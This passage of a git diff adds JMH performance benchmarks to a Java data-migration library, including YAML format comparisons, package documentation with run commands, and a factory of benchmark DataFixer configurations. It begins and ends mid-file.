+ */ + @Param({"SMALL", "MEDIUM", "LARGE"}) + private PayloadSize payloadSize; + + /** + * SnakeYAML DynamicOps implementation using native Java types. + */ + private SnakeYamlOps snakeOps; + + /** + * Jackson YAML DynamicOps implementation using JsonNode. + */ + private JacksonYamlOps jacksonOps; + + /** + * Pre-generated test data using SnakeYAML. + */ + private Dynamic snakeYamlData; + + /** + * Pre-generated test data using Jackson YAML. + */ + private Dynamic jacksonYamlData; + + /** + * DataFixer for migration benchmarks. + */ + private DataFixer fixer; + + /** + * Source version for migrations (v1). + */ + private DataVersion fromVersion; + + /** + * Target version for migrations (v2). + */ + private DataVersion toVersion; + + /** + * Initializes DynamicOps instances, test data, and DataFixer. + * + *

Both SnakeYAML and Jackson YAML data are pre-generated to isolate + * benchmark measurements from data creation overhead.

+ */ + @Setup(Level.Trial) + public void setup() { + this.snakeOps = SnakeYamlOps.INSTANCE; + this.jacksonOps = JacksonYamlOps.INSTANCE; + + this.snakeYamlData = BenchmarkDataGenerator.generate(this.snakeOps, this.payloadSize); + this.jacksonYamlData = BenchmarkDataGenerator.generate(this.jacksonOps, this.payloadSize); + + this.fixer = BenchmarkBootstrap.createSingleFixFixer(); + this.fromVersion = new DataVersion(1); + this.toVersion = new DataVersion(2); + } + + // ==================== Data Generation Benchmarks ==================== + + /** + * Benchmarks Dynamic object generation using SnakeYamlOps. + * + *

Measures the time to create a complete test data structure using + * SnakeYAML's native Java type representation (Maps and Lists).

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void snakeYamlGenerate(final Blackhole blackhole) { + final Dynamic data = BenchmarkDataGenerator.generate(this.snakeOps, this.payloadSize); + blackhole.consume(data); + } + + /** + * Benchmarks Dynamic object generation using JacksonYamlOps. + * + *

Measures the time to create a complete test data structure using + * Jackson's JsonNode representation for YAML.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void jacksonYamlGenerate(final Blackhole blackhole) { + final Dynamic data = BenchmarkDataGenerator.generate(this.jacksonOps, this.payloadSize); + blackhole.consume(data); + } + + // ==================== Field Access Benchmarks ==================== + + /** + * Benchmarks field read access on SnakeYAML-backed Dynamic. + * + *

Measures the time to retrieve a single field from a pre-existing + * SnakeYAML-based Dynamic object (backed by Java Map).

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void snakeYamlFieldRead(final Blackhole blackhole) { + final Dynamic field = this.snakeYamlData.get(FIELD_NAME); + blackhole.consume(field); + } + + /** + * Benchmarks field read access on Jackson YAML-backed Dynamic. + * + *

Measures the time to retrieve a single field from a pre-existing + * Jackson YAML-based Dynamic object.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void jacksonYamlFieldRead(final Blackhole blackhole) { + final Dynamic field = this.jacksonYamlData.get(FIELD_NAME); + blackhole.consume(field); + } + + // ==================== Field Modification Benchmarks ==================== + + /** + * Benchmarks field set operation on SnakeYAML-backed Dynamic. + * + *

Measures the time to add a new field to a SnakeYAML-based Dynamic object.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void snakeYamlFieldSet(final Blackhole blackhole) { + final Dynamic result = this.snakeYamlData.set( + "newField", + this.snakeYamlData.createString("newValue") + ); + blackhole.consume(result); + } + + /** + * Benchmarks field set operation on Jackson YAML-backed Dynamic. + * + *

Measures the time to add a new field to a Jackson YAML-based Dynamic object.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void jacksonYamlFieldSet(final Blackhole blackhole) { + final Dynamic result = this.jacksonYamlData.set( + "newField", + this.jacksonYamlData.createString("newValue") + ); + blackhole.consume(result); + } + + // ==================== Migration Benchmarks ==================== + + /** + * Benchmarks DataFixer migration on SnakeYAML-backed data. + * + *

Measures the time to apply a single fix migration to SnakeYAML-based + * Dynamic data.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void snakeYamlMigration(final Blackhole blackhole) { + final Dynamic result = this.fixer.update( + BenchmarkBootstrap.BENCHMARK_TYPE, + this.snakeYamlData, + this.fromVersion, + this.toVersion + ); + blackhole.consume(result); + } + + /** + * Benchmarks DataFixer migration on Jackson YAML-backed data. + * + *

Measures the time to apply a single fix migration to Jackson YAML-based + * Dynamic data.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void jacksonYamlMigration(final Blackhole blackhole) { + final Dynamic result = this.fixer.update( + BenchmarkBootstrap.BENCHMARK_TYPE, + this.jacksonYamlData, + this.fromVersion, + this.toVersion + ); + blackhole.consume(result); + } +} diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/package-info.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/package-info.java new file mode 100644 index 0000000..d2c5b40 --- /dev/null +++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/package-info.java @@ -0,0 +1,158 @@ +/* + * Copyright (c) 2026 Splatgames.de Software and Contributors + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in all + * copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +/** + * Format-focused JMH benchmarks comparing DynamicOps implementations in the Aether DataFixers framework. + * + *

This package contains benchmarks that compare the performance of different serialization + * format implementations. These benchmarks help users choose the optimal DynamicOps implementation + * for their specific use case based on empirical performance data.

+ * + *

Benchmark Classes

+ * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + *
ClassFormats ComparedKey Metrics
{@link de.splatgames.aether.datafixers.benchmarks.format.JsonBenchmark}GsonOps vs JacksonJsonOpsGeneration, field access, modification, migration
{@link de.splatgames.aether.datafixers.benchmarks.format.YamlBenchmark}SnakeYamlOps vs JacksonYamlOpsGeneration, field access, modification, migration
{@link de.splatgames.aether.datafixers.benchmarks.format.TomlXmlBenchmark}JacksonTomlOps vs JacksonXmlOpsGeneration, field access, modification, migration
{@link de.splatgames.aether.datafixers.benchmarks.format.CrossFormatBenchmark}All format pairsCross-format conversion overhead
+ * + *

Supported DynamicOps Implementations

+ * + * + * + * + * + * + * + * + *
FormatImplementationLibraryNode Type
JSONGsonOpsGoogle GsonJsonElement
JacksonJsonOpsJackson DatabindJsonNode
YAMLSnakeYamlOpsSnakeYAMLObject (native)
JacksonYamlOpsJackson Dataformat YAMLJsonNode
TOMLJacksonTomlOpsJackson Dataformat TOMLJsonNode
XMLJacksonXmlOpsJackson Dataformat XMLJsonNode
+ * + *

Benchmark Operations

+ *

Each format benchmark measures the following operations:

+ *
    + *
  • Data Generation: Time to create Dynamic objects from scratch
  • + *
  • Field Read: Time to retrieve a single field from existing data
  • + *
  • Field Set: Time to add/modify a field (creates new immutable structure)
  • + *
  • Migration: Time to apply a DataFix to format-specific data
  • + *
+ * + *

Running Format Benchmarks

+ *
{@code
+ * # Run all format benchmarks
+ * java -jar benchmarks.jar ".*format.*"
+ *
+ * # Run specific format benchmark
+ * java -jar benchmarks.jar JsonBenchmark
+ * java -jar benchmarks.jar YamlBenchmark
+ * java -jar benchmarks.jar TomlXmlBenchmark
+ * java -jar benchmarks.jar CrossFormatBenchmark
+ *
+ * # Run all JSON-related benchmarks
+ * java -jar benchmarks.jar ".*Json.*"
+ *
+ * # Run generation benchmarks across all formats
+ * java -jar benchmarks.jar ".*Benchmark.*Generate"
+ *
+ * # Run migration benchmarks across all formats
+ * java -jar benchmarks.jar ".*Benchmark.*Migration"
+ *
+ * # Run with specific payload size
+ * java -jar benchmarks.jar ".*format.*" -p payloadSize=MEDIUM
+ * }
+ * + *

Choosing a DynamicOps Implementation

+ *

Use these benchmark results to guide implementation selection:

+ * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + *
ScenarioRecommendedRationale
General JSON processingGsonOps or JacksonJsonOpsCompare benchmarks; both are mature and fast
Configuration files (YAML)SnakeYamlOpsNative YAML features (anchors, aliases)
Mixed Jackson ecosystemJacksonJsonOps/JacksonYamlOpsShared code, faster cross-format conversion
TOML configurationJacksonTomlOpsOnly TOML option; good for Rust interop
Legacy XML systemsJacksonXmlOpsOnly XML option; document format support
+ * + *

Cross-Format Conversion

+ *

The {@link de.splatgames.aether.datafixers.benchmarks.format.CrossFormatBenchmark} + * measures conversion overhead between formats. Key insights:

+ *
    + *
  • Same-ecosystem: Jackson JSON ↔ Jackson YAML is fastest (shared JsonNode)
  • + *
  • Cross-ecosystem: Gson ↔ SnakeYAML requires full tree traversal
  • + *
  • Asymmetry: A→B may differ from B→A due to construction costs
  • + *
+ * + *

Interpreting Results

+ *
    + *
  • Throughput: Higher ops/sec is better for high-volume scenarios
  • + *
  • Average time: Lower latency is better for interactive applications
  • + *
  • Scaling: Compare SMALL vs MEDIUM vs LARGE to understand data volume impact
  • + *
  • Variance: High ± values may indicate GC sensitivity or JIT instability
  • + *
+ * + * @see de.splatgames.aether.datafixers.benchmarks.format.JsonBenchmark + * @see de.splatgames.aether.datafixers.benchmarks.format.YamlBenchmark + * @see de.splatgames.aether.datafixers.benchmarks.format.TomlXmlBenchmark + * @see de.splatgames.aether.datafixers.benchmarks.format.CrossFormatBenchmark + * @see de.splatgames.aether.datafixers.api.dynamic.DynamicOps + * @since 1.0.0 + */ +package de.splatgames.aether.datafixers.benchmarks.format; diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/package-info.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/package-info.java new file mode 100644 index 0000000..be94d9b --- /dev/null +++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/package-info.java @@ -0,0 +1,191 @@ +/* + * Copyright (c) 2026 Splatgames.de Software and Contributors + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in all + * copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +/** + * JMH benchmark suite for the Aether DataFixers framework. + * + *

This package and its sub-packages provide comprehensive performance benchmarks + * for all major components of the Aether DataFixers system. The benchmarks use + * JMH (Java Microbenchmark Harness) + * for accurate, reliable performance measurements.

+ * + *

Package Structure

+ * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + *
PackageFocus AreaKey Benchmarks
{@link de.splatgames.aether.datafixers.benchmarks.core core}DataFixer migration performanceSingleFixBenchmark, MultiFixChainBenchmark, SchemaLookupBenchmark
{@link de.splatgames.aether.datafixers.benchmarks.codec codec}Codec encode/decode performancePrimitiveCodecBenchmark, CollectionCodecBenchmark
{@link de.splatgames.aether.datafixers.benchmarks.concurrent concurrent}Thread-safety and scalabilityConcurrentMigrationBenchmark
{@code format}DynamicOps format comparisonsJsonBenchmark, YamlBenchmark, CrossFormatBenchmark
{@link de.splatgames.aether.datafixers.benchmarks.util util}Benchmark infrastructureBenchmarkBootstrap, BenchmarkDataGenerator, PayloadSize
+ * + *

Running Benchmarks

+ * + *

Via Maven (Development)

+ *
{@code
+ * # Run all benchmarks
+ * mvn exec:java -pl aether-datafixers-benchmarks
+ *
+ * # Run specific benchmark
+ * mvn exec:java -pl aether-datafixers-benchmarks -Dexec.args="SingleFixBenchmark"
+ * }
+ * + *

Via Fat JAR (Production)

+ *
{@code
+ * # Build the benchmark JAR
+ * mvn clean package -pl aether-datafixers-benchmarks -DskipTests
+ *
+ * # Run all benchmarks
+ * java -jar target/aether-datafixers-benchmarks-*-benchmarks.jar
+ *
+ * # List available benchmarks
+ * java -jar target/*-benchmarks.jar -l
+ *
+ * # Run with parameters
+ * java -jar target/*-benchmarks.jar -p payloadSize=LARGE -wi 5 -i 10 -f 2
+ *
+ * # Output JSON results
+ * java -jar target/*-benchmarks.jar -rf json -rff results.json
+ * }
+ * + *

Programmatic API

+ *
{@code
+ * // Run all benchmarks
+ * BenchmarkRunner.runAllBenchmarks();
+ *
+ * // Run quick validation
+ * BenchmarkRunner.runQuickBenchmarks();
+ *
+ * // Run specific category
+ * BenchmarkRunner.runCoreBenchmarks();
+ * BenchmarkRunner.runFormatBenchmarks();
+ * }
+ * + *

Benchmark Categories Explained

+ * + *

Core Benchmarks

+ *

Measure the fundamental DataFixer operations:

+ *
    + *
  • Single fix: Baseline performance for one migration step
  • + *
  • Chain migration: How performance scales with migration path length
  • + *
  • Schema lookup: Registry access patterns and caching effectiveness
  • + *
+ * + *

Codec Benchmarks

+ *

Measure serialization and deserialization performance:

+ *
    + *
  • Primitive codecs: Baseline for bool, int, long, float, double, string
  • + *
  • Collection codecs: List encoding/decoding with size scaling
  • + *
  • Round-trip: Combined encode + decode performance
  • + *
+ * + *

Concurrent Benchmarks

+ *

Validate thread-safety and measure scalability:

+ *
    + *
  • Multi-threaded migration: Contention under concurrent load
  • + *
  • Registry access: Concurrent read performance
  • + *
  • Scaling analysis: Fixed thread counts (4, 8, MAX)
  • + *
+ * + *

Format Benchmarks

+ *

Compare different DynamicOps implementations:

+ *
    + *
  • JSON: GsonOps vs JacksonJsonOps
  • + *
  • YAML: SnakeYamlOps vs JacksonYamlOps
  • + *
  • Other: TOML and XML via Jackson
  • + *
  • Cross-format: Conversion between formats
  • + *
+ * + *

Default Configuration

+ * + * + * + * + * + * + * + *
SettingValuePurpose
Warmup iterations5JIT compilation stabilization
Measurement iterations10Statistical significance
Forks2JVM variance mitigation
JVM heap2 GBAvoid GC interference
Time unitVariesns for primitives, µs for complex ops
+ * + *

Interpreting Results

+ *
    + *
  • Throughput (ops/time): Higher is better; measures operation rate
  • + *
  • Average time (time/op): Lower is better; measures latency
  • + *
  • Error (±): 99.9% confidence interval; smaller is more reliable
  • + *
  • Scaling: Compare across parameter values (payload size, thread count)
  • + *
+ * + *

Common JMH Options

+ * + * + * + * + * + * + * + * + * + * + * + * + *
OptionDescription
{@code -wi N}Number of warmup iterations
{@code -i N}Number of measurement iterations
{@code -f N}Number of forks (JVM instances)
{@code -t N}Number of threads
{@code -p key=value}Set parameter value
{@code -rf format}Result format (json, csv, text)
{@code -rff file}Result output file
{@code -prof profiler}Enable profiler (gc, async, jfr)
{@code -l}List available benchmarks
{@code -h}Show help
+ * + *

Best Practices

+ *
    + *
  • Isolated environment: Run on dedicated hardware with minimal background processes
  • + *
  • Multiple forks: Use at least 2 forks for reliable results
  • + *
  • Sufficient warmup: Allow JIT compilation to stabilize before measurement
  • + *
  • Consistent conditions: Compare results from the same machine and JVM version
  • + *
  • Statistical analysis: Consider error margins when comparing results
  • + *
+ * + * @see de.splatgames.aether.datafixers.benchmarks.BenchmarkRunner + * @see de.splatgames.aether.datafixers.benchmarks.core + * @see de.splatgames.aether.datafixers.benchmarks.codec + * @see de.splatgames.aether.datafixers.benchmarks.concurrent + * @see de.splatgames.aether.datafixers.benchmarks.util + * @since 1.0.0 + */ +package de.splatgames.aether.datafixers.benchmarks; diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkBootstrap.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkBootstrap.java new file mode 100644 index 0000000..1139e7e --- /dev/null +++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkBootstrap.java @@ -0,0 +1,376 @@ +/* + * Copyright (c) 2026 Splatgames.de Software and Contributors + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in all + * copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +package de.splatgames.aether.datafixers.benchmarks.util; + +import com.google.gson.JsonElement; +import de.splatgames.aether.datafixers.api.DataVersion; +import de.splatgames.aether.datafixers.api.TypeReference; +import de.splatgames.aether.datafixers.api.fix.DataFix; +import de.splatgames.aether.datafixers.api.fix.DataFixer; +import de.splatgames.aether.datafixers.codec.json.gson.GsonOps; +import de.splatgames.aether.datafixers.core.fix.DataFixerBuilder; +import de.splatgames.aether.datafixers.core.fix.noop.NoOpDataFixerContext; +import de.splatgames.aether.datafixers.testkit.factory.QuickFix; +import org.jetbrains.annotations.NotNull; + +/** + * Factory for pre-configured {@link DataFixer} instances optimized for benchmarking. + * + *

This utility class provides various DataFixer configurations for measuring + * different aspects of migration performance. All created fixers use {@link NoOpDataFixerContext} to eliminate logging + * overhead during benchmark measurements.

+ * + *

Available Fixer Configurations

+ * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + *
MethodFix CountFix TypesUse Case
{@link #createSingleFixFixer()}1RenameBaseline single-operation performance
{@link #createIdentityFixer()}1Identity (no-op)Framework overhead measurement
{@link #createChainFixer(int)}1-100Rename (homogeneous)Chain length scaling analysis
{@link #createMixedFixer(int)}4+Rename, Add, Remove, TransformRealistic migration scenarios
{@link #createPlayerFixer()}4Mixed (realistic)Domain-specific migration testing
+ * + *

Type References

+ *

Two type references are provided for categorizing benchmark data:

+ *
    + *
  • {@link #BENCHMARK_TYPE} - Generic benchmark data (used by most benchmarks)
  • + *
  • {@link #PLAYER_TYPE} - Player-like data structures (for domain-specific tests)
  • + *
+ * + *

Design Considerations

+ *
    + *
  • No-op context: All fixers use {@link NoOpDataFixerContext} to prevent + * logging from affecting benchmark measurements
  • + *
  • GsonOps: All fixes use {@link GsonOps} as the reference DynamicOps + * implementation for consistency
  • + *
  • Testkit integration: Uses {@link QuickFix} from the testkit module + * for efficient fix creation
  • + *
+ * + *

Usage Example

+ *
{@code
+ * // In a JMH benchmark setup method
+ * @Setup(Level.Trial)
+ * public void setup() {
+ *     this.fixer = BenchmarkBootstrap.createChainFixer(10);
+ *     this.input = BenchmarkDataGenerator.generate(GsonOps.INSTANCE, PayloadSize.MEDIUM);
+ * }
+ *
+ * @Benchmark
+ * public void benchmarkMigration(Blackhole blackhole) {
+ *     Dynamic result = fixer.update(
+ *         BenchmarkBootstrap.BENCHMARK_TYPE,
+ *         input,
+ *         new DataVersion(1),
+ *         new DataVersion(11)
+ *     );
+ *     blackhole.consume(result);
+ * }
+ * }
+ * + * @author Erik Pförtner + * @see BenchmarkDataGenerator + * @see PayloadSize + * @see de.splatgames.aether.datafixers.testkit.factory.QuickFix + * @since 1.0.0 + */ +public final class BenchmarkBootstrap { + + /** + * Type reference for generic benchmark data. + * + *

Used by most benchmarks as the default type for test data. The type + * name "benchmark" is intentionally generic to avoid confusion with domain-specific types.

+ */ + public static final TypeReference BENCHMARK_TYPE = new TypeReference("benchmark"); + + /** + * Type reference for player-like benchmark data. + * + *

Used by benchmarks that simulate game player data migrations, + * providing a realistic domain-specific testing scenario.

+ * + * @see #createPlayerFixer() + * @see BenchmarkDataGenerator#generatePlayerData(DynamicOps) + */ + public static final TypeReference PLAYER_TYPE = new TypeReference("player"); + + /** + * Private constructor to prevent instantiation. + */ + private BenchmarkBootstrap() { + // Utility class + } + + /** + * Creates a DataFixer with a single field rename fix (v1 → v2). + * + *

This is the simplest non-trivial fixer configuration, useful for + * measuring baseline single-operation performance. The fix renames a field from "oldName" to "newName".

+ * + *

Version mapping: v1 → v2 (single step)

+ * + * @return a new DataFixer configured for single-fix benchmarks + * @see #createIdentityFixer() + */ + @NotNull + public static DataFixer createSingleFixFixer() { + return new DataFixerBuilder(new DataVersion(2)) + .withDefaultContext(NoOpDataFixerContext.INSTANCE) + .addFix(BENCHMARK_TYPE, QuickFix.renameField( + GsonOps.INSTANCE, + "rename_field_v1_v2", + 1, 2, + "oldName", "newName")) + .build(); + } + + /** + * Creates a DataFixer with an identity fix (no-op transformation). + * + *

The identity fixer passes data through without modification, useful for + * measuring pure framework overhead including:

+ *
    + *
  • Version checking and fix selection
  • + *
  • Dynamic wrapper creation and manipulation
  • + *
  • DataResult monad operations
  • + *
  • Type reference resolution
  • + *
+ * + *

Comparing identity fixer performance against {@link #createSingleFixFixer()} + * reveals the actual cost of field operations versus framework overhead.

+ * + *

Version mapping: v1 → v2 (no data changes)

+ * + * @return a new DataFixer with an identity (pass-through) fix + * @see #createSingleFixFixer() + */ + @NotNull + public static DataFixer createIdentityFixer() { + return new DataFixerBuilder(new DataVersion(2)) + .withDefaultContext(NoOpDataFixerContext.INSTANCE) + .addFix(BENCHMARK_TYPE, QuickFix.identity("identity_v1_v2", 1, 2)) + .build(); + } + + /** + * Creates a DataFixer with a chain of sequential homogeneous fixes. + * + *

Each fix in the chain performs a field rename operation (field1 → field2, + * field2 → field3, etc.), simulating migration scenarios with multiple consecutive version upgrades. This + * configuration is ideal for measuring how migration performance scales with chain length.

+ * + *

Version mapping: v1 → v2 → v3 → ... → v(fixCount+1)

+ * + *

Typical Parameter Values for Benchmarks

+ * + * + * + * + * + * + * + * + *
fixCountScenario
1Baseline (compare with {@link #createSingleFixFixer()})
5Short chain (minor version updates)
10Medium chain (typical upgrade path)
25Long chain (significant version gap)
50Stress test (extended migration)
100Maximum supported (extreme case)
+ * + * @param fixCount the number of fixes in the chain (must be between 1 and 100 inclusive) + * @return a new DataFixer with the specified number of sequential rename fixes + * @throws IllegalArgumentException if fixCount is less than 1 or greater than 100 + * @see #createMixedFixer(int) + */ + @NotNull + public static DataFixer createChainFixer(final int fixCount) { + if (fixCount < 1 || fixCount > 100) { + throw new IllegalArgumentException("fixCount must be between 1 and 100"); + } + + final DataFixerBuilder builder = new DataFixerBuilder(new DataVersion(fixCount + 1)) + .withDefaultContext(NoOpDataFixerContext.INSTANCE); + + for (int i = 0; i < fixCount; i++) { + final int fromVersion = i + 1; + final int toVersion = i + 2; + final DataFix fix = QuickFix.renameField( + GsonOps.INSTANCE, + "rename_v" + fromVersion + "_v" + toVersion, + fromVersion, toVersion, + "field" + fromVersion, "field" + toVersion); + builder.addFix(BENCHMARK_TYPE, fix); + } + + return builder.build(); + } + + /** + * Creates a DataFixer with mixed heterogeneous fix types for realistic benchmarking. + * + *

Unlike {@link #createChainFixer(int)} which uses only rename operations, + * this method creates a chain with rotating fix types that more accurately represent real-world migration + * scenarios:

+ * + * + * + * + * + * + * + *
Position (mod 4)Fix TypeOperation
0RenameRenames a field
1AddAdds a new string field with default value
2RemoveRemoves a field
3TransformTransforms field value (string concatenation)
+ * + *

Version mapping: v1 → v2 → v3 → ... → v(fixCount+1)

+ * + *

Comparing mixed fixer performance against chain fixer performance + * reveals the relative cost of different fix operations.

+ * + * @param fixCount the number of fixes in the chain (must be at least 4 to include all fix types) + * @return a new DataFixer with mixed fix types cycling through rename, add, remove, and transform operations + * @throws IllegalArgumentException if fixCount is less than 4 + * @see #createChainFixer(int) + */ + @NotNull + public static DataFixer createMixedFixer(final int fixCount) { + if (fixCount < 4) { + throw new IllegalArgumentException("fixCount must be at least 4 for mixed fixes"); + } + + final DataFixerBuilder builder = new DataFixerBuilder(new DataVersion(fixCount + 1)) + .withDefaultContext(NoOpDataFixerContext.INSTANCE); + + for (int i = 0; i < fixCount; i++) { + final int fromVersion = i + 1; + final int toVersion = i + 2; + final DataFix fix = createMixedFix(fromVersion, toVersion, i % 4); + builder.addFix(BENCHMARK_TYPE, fix); + } + + return builder.build(); + } + + /** + * Creates a DataFixer for player data migration benchmarks. + * + *

This fixer simulates a realistic game player data migration scenario + * with four sequential fixes representing typical schema evolution:

+ * + * + * + * + * + * + * + *
VersionFixDescription
v1 → v2Rename{@code name} → {@code playerName}
v2 → v3AddAdd {@code score} field (default: 0)
v3 → v4TransformDouble the {@code level} value
v4 → v5RemoveRemove {@code tempField}
+ * + *

Use with {@link BenchmarkDataGenerator#generatePlayerData(DynamicOps)} for + * complete domain-specific migration testing.

+ * + * @return a new DataFixer configured for player data migrations (v1 → v5) + * @see #PLAYER_TYPE + * @see BenchmarkDataGenerator#generatePlayerData(DynamicOps) + */ + @NotNull + public static DataFixer createPlayerFixer() { + return new DataFixerBuilder(new DataVersion(5)) + .withDefaultContext(NoOpDataFixerContext.INSTANCE) + .addFix(PLAYER_TYPE, QuickFix.renameField( + GsonOps.INSTANCE, "rename_name_v1_v2", 1, 2, + "name", "playerName")) + .addFix(PLAYER_TYPE, QuickFix.addIntField( + GsonOps.INSTANCE, "add_score_v2_v3", 2, 3, + "score", 0)) + .addFix(PLAYER_TYPE, QuickFix.transformField( + GsonOps.INSTANCE, "double_level_v3_v4", 3, 4, + "level", field -> field.createInt( + field.asInt().result().orElse(1) * 2))) + .addFix(PLAYER_TYPE, QuickFix.removeField( + GsonOps.INSTANCE, "remove_temp_v4_v5", 4, 5, + "tempField")) + .build(); + } + + /** + * Creates a specific fix type based on the fixType selector. + * + *

Internal factory method used by {@link #createMixedFixer(int)} to create + * different fix types in a rotating pattern.

+ * + * @param fromVersion the source version for the fix + * @param toVersion the target version for the fix + * @param fixType the fix type selector (0=rename, 1=add, 2=remove, 3=transform) + * @return a DataFix of the specified type + */ + private static DataFix createMixedFix(final int fromVersion, + final int toVersion, + final int fixType) { + return switch (fixType) { + case 0 -> QuickFix.renameField( + GsonOps.INSTANCE, + "rename_v" + fromVersion + "_v" + toVersion, + fromVersion, toVersion, + "renamedField", "renamedField"); + case 1 -> QuickFix.addStringField( + GsonOps.INSTANCE, + "add_v" + fromVersion + "_v" + toVersion, + fromVersion, toVersion, + "newField" + toVersion, "default"); + case 2 -> QuickFix.removeField( + GsonOps.INSTANCE, + "remove_v" + fromVersion + "_v" + toVersion, + fromVersion, toVersion, + "removedField" + fromVersion); + case 3 -> QuickFix.transformField( + GsonOps.INSTANCE, + "transform_v" + fromVersion + "_v" + toVersion, + fromVersion, toVersion, + "transformedField", + field -> field.createString( + field.asString().result().orElse("") + "_transformed")); + default -> QuickFix.identity( + "identity_v" + fromVersion + "_v" + toVersion, + fromVersion, toVersion); + }; + } +} diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkDataGenerator.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkDataGenerator.java new file mode 100644 index 0000000..19a93cc --- /dev/null +++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkDataGenerator.java @@ -0,0 +1,324 @@ +/* + * Copyright (c) 2026 Splatgames.de Software and Contributors + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in all + * copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN 